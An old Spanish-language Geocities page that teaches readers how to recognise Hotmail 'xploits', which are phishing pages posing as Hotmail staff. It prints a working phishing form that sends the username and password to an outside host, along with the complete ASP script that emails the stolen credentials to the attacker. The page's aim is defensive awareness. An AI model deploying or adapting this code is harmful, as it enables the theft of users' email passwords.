CentralFWD Proteger mi correo electrónico (volver al inicio)(visitar Google Fans)
(ir al indice de Articulos, hay muchos mas sobre el tema)
Nickname A Chatear seguro hay alguien conectado

Este pequeño texto es para que sepas como protegerse de los mal intencionados que quieren robarte tu password

1-Definir el perfil del atacante:
Una persona que utilizara algunos de los medios aquí descriptos para obtener un password de manera ilegal, no será seguramente alguien muy instruido en informática y programación, esto se deduce del hecho de que los dos medios requieren la utilización de código realizado por una tercera persona(ni el atacante, ni la víctima).
2- Xploits:
Los Xploits son archivos HTML(paginas web), la mayoria funciona de la siguiente manera
El atacante obtiene un archivo HTML(el xploit) de un sitio de hackers, este archivo simula ser por ejemplo un mail del "Personal de Hotmail" y contiene un formulario como el que sigue:

Felicitaciones usted ha sido elegido por hotmail®
Usted tiene la oportunidad de agrandar en 10mb la capacidad de su casilla:
@hotmail.com
Contraseña


El codigo html:
<form name="xploit" id="xploit" action="http://www.xxxxx.com/xploit.asp" method="POST" Onsubmit="return validacion()">
<input type="text" name="user">@hotmail.com<br>
<input type="password" name="pass"> Contraseña<br>
<input name="mailatacante" type="hidden" id="mailatacante" value="[email protected]">
</form>
Los pedazos marcado con rojo son de vital importancia para descubrir posibles xploits, el primero(campo 'action' del formulario) indica hacia donde sera remitida la información si este tiene un valor relacionado con una pagina de hack como por ejemplo DragonJar de seguro es un xploit.
El segundo pedazo, el campo oculto(type=hidden), nos dice hacia que mail sera redirigida la información del formulario.
El sistema:
La pagina dinamica http://www.xxxxx.com/xploit.asp recibe el formulario y lo envia al mail que figura mas abajo [email protected].
Codigo de una pagina dinamica en ASP:

<%
'fichero xploit.asp
Dim cBody
cBody=Request.Form("user")&Request.Form("pass")
Set oCDO = Server.CreateObject("CDONTS.NewMail")
oCDO.From = "[email protected]"
oCDO.To = Request.Form("mailatacante")
oCDO.Subject = "Aca tienes las contraseñas que pediste"
oCDO.Body = cBody
oCDO.Send
Set oCDO = Nothing
%>

Para obtener los codigos fuente de los formularios(y asi ver los datos importantes) se debe hacer click derecho sobre la pagina y seleccionar 'ver codigo fuente'
Finalmente cuando recibas un archivo sospechoso fijate tambien el mail desde donde te llego, por lo general los mails del personal de Hotmail o de Yahoo tienen un icono de la empresa para poder identificarlos.
Articulo relacionado con el tema: 4 Xploits Hotmail





Para enviar esta pagina a un amigo solo coloca el link en un e-mail:

 





(volver al inicio)
Agregar a los Favoritos | Establecer como inicio

Hosted by www.Geocities.ws

1